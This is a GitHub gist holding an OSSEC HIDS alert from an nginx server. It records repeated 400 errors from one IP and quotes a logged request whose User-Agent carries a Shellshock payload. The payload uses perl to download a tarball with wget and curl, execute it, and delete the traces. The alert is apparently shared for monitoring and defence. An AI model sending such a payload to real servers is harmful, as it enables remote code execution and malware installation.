Created
March 22, 2016 00:15
-
-
Save burdzwastaken/ace3b56e3ae0ece4ce7f to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
OSSEC HIDS Notification. | |
2016 Mar 20 09:38:57 | |
Received From: ip->/var/log/nginx/access.log | |
Rule: 31151 fired (level 10) -> "Multiple web server 400 error codes from same source ip." | |
Portion of the log(s): | |
119.188.4.3 - - [20/Mar/2016:09:38:55 +0000] "GET /gitweb/ HTTP/1.1" 404 151 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22wget http://IP/asd.tar -O /tmp/asd.tar;curl -O /tmp/asd.tar http://IP/asd.tar ; perl /tmp/asd.tar; rm -fr /tmp/asd.tar;rm -rf /tmp/asd.*\x22);'" |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment